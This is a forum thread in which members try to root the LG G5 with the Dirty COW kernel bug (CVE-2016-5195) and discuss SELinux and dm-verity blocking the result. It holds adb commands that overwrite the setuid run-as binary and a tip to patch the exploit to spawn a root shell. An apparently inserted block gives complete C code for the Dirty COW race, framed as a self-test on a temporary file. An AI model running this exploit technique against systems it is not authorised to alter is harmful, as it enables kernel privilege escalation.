DirtyCow Test

maksover

Member
Sep 23, 2010
Moscow
4pda.ru
Someone please test this. I can't right now (at work, don't have G5) so please update me. It works on my HTC 10 but I do not know if it will work on the G5...

Code:

# push the exploit binary and the replacement run-as to a world-writable dir
adb push arm64-v8a/dirtycow /data/local/tmp
adb push arm64-v8a/run-as /data/local/tmp
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell 'chmod 777 /data/local/tmp/dirtycow'
# dirtycow <target> <source>: overwrite the setuid-root run-as with the pushed file
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
# run the replaced binary
adb shell /system/bin/run-as
Hello, about the dirtycow test on the LG G5: tell me the path where you want me to put the files (dirtycow, run-as).
 

YassGo

Senior Member
Mar 4, 2014
Paris
Dude, if you're going to PM me twice and quote me in a thread, at least make sure your message makes sense. I don't even know what you are asking...
Hey bro, I'm also following the V20 thread and I just want to know your thoughts: is it the same way to root the G5? I mean, if it's successful on the V20, is there any chance it can be "ported" to the G5 variants?
Thank you, and I'm here to help if you need some more tests ^^

Sergykm

Senior Member
Nov 1, 2012
Rivne
Hey bro, I'm also following the V20 thread and I just want to know your thoughts: is it the same way to root the G5? I mean, if it's successful on the V20, is there any chance it can be "ported" to the G5 variants?
Thank you, and I'm here to help if you need some more tests ^^
Of course we have a chance. Just be a little patient and don't disturb the dev.
I think if Honestly Annoying needs some help or testing, he'll tell us.

cloud1250000

Senior Member
Jul 4, 2011
Ottawa
To what extent can we modify system before triggering dm-verity?

Also, can I recover from dm-verity?

Edit: Ahahaha, I hope you didn't simply compile https://github.com/timwr/CVE-2016-5195, because this doesn't spawn a root shell. It simply states that the file can spawn one. We need to replace
printf("uid %d\n", getuid()); with the right code.

It should be like this: system("/bin/sh");

Edit2 : more like the cowexec from here https://github.com/jcadduono/CVE-2016-5195

It will not work because of SELinux.

Edit3: I have successfully restored my backed up run-as and did a full reboot, device is still fine. Is dm-verity triggered if we leave the exploit file there?

Edit4: Using cowexec, we have root access.. but... the root user is pretty much.. useless.. I think it would be better to check if it's possible to enable debug/disable dm-verity
(no luck editing hosts or trying to apply any form of bind/ln to the hosts file..)

Edit5: We need something like this https://github.com/scumjr/dirtycow-vdso or base our research more on this http://forum.xda-developers.com/general/security/dirty-cow-t3484879/page4
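The posts above argue about what the dirtycow binary actually does to the target file. The following is an added example, not the dirtycow or cowexec code from the repositories linked in the thread: a self-test for CVE-2016-5195 that runs the published race (madvise(MADV_DONTNEED) against writes through /proc/self/mem into a private, read-only mapping) on a throwaway temporary file and reports whether the file on disk changed. It assumes a Linux host with a writable /proc/self/mem; the file contents, payload and iteration count are constructed for the example.

```c
/* Added example: Dirty COW self-test against a temporary file.
 * Not the dirtycow/cowexec tools from the thread; same race, harmless target. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define ITERATIONS 100000              /* constructed: plenty to win the race when vulnerable */

static const char ORIGINAL[] = "original-contents";  /* constructed file content */
static const char PAYLOAD[]  = "OVERWRITTEN";        /* constructed payload */

struct race {
    void *map;     /* private, read-only mapping of the target file */
    size_t len;
    int memfd;     /* /proc/self/mem, used to write "through" the mapping */
};

/* Thread 1: keep dropping the private COW copy so the page is re-faulted
 * from the page cache, widening the window the bug needs. */
static void *madvise_thread(void *arg)
{
    struct race *r = arg;
    for (int i = 0; i < ITERATIONS; i++)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: write the payload at the mapping address via /proc/self/mem.
 * A patched kernel writes only the private copy; an unpatched one could
 * write the page-cache page, i.e. the read-only file itself. */
static void *write_thread(void *arg)
{
    struct race *r = arg;
    for (int i = 0; i < ITERATIONS; i++)
        if (pwrite(r->memfd, PAYLOAD, strlen(PAYLOAD), (off_t)(uintptr_t)r->map) < 0)
            break;   /* /proc/self/mem not writable here: race cannot be attempted */
    return NULL;
}

/* Returns 1 if the file on disk changed (vulnerable), 0 if unchanged, -1 on setup error. */
int dirtycow_self_test(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    if (write(fd, ORIGINAL, sizeof ORIGINAL) != (ssize_t)sizeof ORIGINAL) { close(fd); return -1; }
    close(fd);
    chmod(path, 0444);                 /* read-only, like /system/bin/run-as */

    fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0) { close(fd); return -1; }
    struct race r = { .len = (size_t)st.st_size };
    r.map = mmap(NULL, r.len, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (r.map == MAP_FAILED) return -1;
    r.memfd = open("/proc/self/mem", O_RDWR);
    if (r.memfd < 0) { munmap(r.map, r.len); return -1; }

    pthread_t t1, t2;
    pthread_create(&t1, NULL, madvise_thread, &r);
    pthread_create(&t2, NULL, write_thread, &r);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    close(r.memfd);
    munmap(r.map, r.len);

    /* Re-read from the file: only a page-cache write by the bug changes this. */
    char buf[64] = {0};
    fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n < 0) return -1;
    return memcmp(buf, PAYLOAD, strlen(PAYLOAD)) == 0 ? 1 : 0;
}

/* Creates a temp file, runs the test on it, removes it; same return values. */
int run_self_test_on_tmpfile(void)
{
    char path[] = "/tmp/dirtycow-selftest-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    close(fd);
    int v = dirtycow_self_test(path);
    unlink(path);
    return v;
}

int main(void)
{
    int v = run_self_test_on_tmpfile();
    puts(v == 1 ? "VULNERABLE: read-only file was modified through a private mapping"
       : v == 0 ? "not vulnerable (or race lost)" : "setup failed");
    return v == 1 ? 1 : 0;
}
```

This only tells you whether the kernel lets the write reach the file; as the later posts note, even a successful overwrite of run-as on this device still leaves the resulting root process confined by SELinux.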

LupineDream

Senior Member
Sep 6, 2010
Kersey
https://su.chainfire.eu/

adb is an unprivileged shell on stock ROMs. As soon as run-as executes you are dropped back to UID 0.
pseudo-code:
Code:
/bin/bash - {
    copy all prerequisites to tmp
    run background process to repeatedly flush ram (lg security)
    shove su and other files with dirtycow, including busybox
    run supersu installer as a background process.
    wait for its exit code in background loop.
    clean tmp
    end ram flushing process
    reboot device
}
Hope that gives some ideas.

happy_5

Senior Member
Apr 14, 2012
Dallas
Have Sprint Lg G5 - how can I help with testing?


To what extent can we modify system before triggering dm-verity?

Edit4: Using cowexec, we have root access.. but... the root user is pretty much.. useless.. I think it would be better to check if it's possible to enable debug/disable dm-verity
(no luck editing hosts or trying to apply any form of bind/ln to the hosts file..)

Edit5: We need something like this https://github.com/scumjr/dirtycow-vdso or base our research more on this http://forum.xda-developers.com/general/security/dirty-cow-t3484879/page4
Can you expand on why/how the root user is "useless"? Can you not install or flash certain programs, do you lose root on reboot...?
 

einhuman197

Senior Member
Dec 7, 2014
Awesome, but I have to slow down your hype. You cannot install SuperSU, only KingRoot. That's because SuperSU only has systemless on >Lollipop and this will brick. Xposed will work when you install it with FlashFire. So root+Xposed will work, but only with special methods.
@dev keep up the good work, we're nearly able to root many phones.
 

Sergykm

Senior Member
Nov 1, 2012
Rivne
Awesome, but I have to slow down your hype. You cannot install SuperSU, only KingRoot. That's because SuperSU only has systemless on >Lollipop and this will brick. Xposed will work when you install it with FlashFire. So root+Xposed will work, but only with special methods.
@dev keep up the good work, we're nearly able to root many phones.
Can you install KingRoot and Xposed now? All I need from root is Xposed with modules. I can do all I want with Xposed.

Sent from my LG-H850 using XDA-Developers mobile app

cloud1250000

Senior Member
Jul 4, 2011
Ottawa
Have Sprint LG G5 - how can I help with testing?

Can you expand on why/how the root user is "useless"? Can you not install or flash certain programs, do you lose root on reboot...?
Because of SELinux, the root user is pretty much useless. With dirtycow, we can appear as root, but when we actually try anything (like spawning a root shell) the system prevents us from doing so.
Dirtycow is working great on devices with SELinux set to permissive, but not on ours.

happy_5

Senior Member
Apr 14, 2012
Dallas
Thanks

Many thanks. Now I get it. Needing SELinux permissive makes sense.

Hope somebody comes through with a workaround!

Because of SELinux, the root user is pretty much useless. With dirtycow, we can appear as root, but when we actually try anything (like spawning a root shell) the system prevents us from doing so.
Dirtycow is working great on devices with SELinux set to permissive, but not on ours.
 

Honestly Annoying

Senior Member
May 17, 2016
chicago
twitter.com
Even if we get a root shell, there will be no SuperSu or TWRP unless we get an unlocked bootloader. The goal is to get a root shell so we can work on getting an unlocked bootloader through a root shell and/or I can pull the system.img and make a custom system like with the G4. Just letting everyone know so I can stop getting all of these PMs asking "WHEN WILL I HAVE ROOT WHAT'S THE ETA ON SUPERSU GIVE ME ROOT"
 

happy_5

Senior Member
Apr 14, 2012
Dallas
Wait, I thought we needed root to run Xposed. So at least we can flash via Flashfire and (certain) Xposed modules will work?

Awesome, but I have to slow down your hype. You cannot install SuperSU, only KingRoot. That's because SuperSU only has systemless on >Lollipop and this will brick. Xposed will work when you install it with FlashFire. So root+Xposed will work, but only with special methods.
@dev keep up the good work, we're nearly able to root many phones.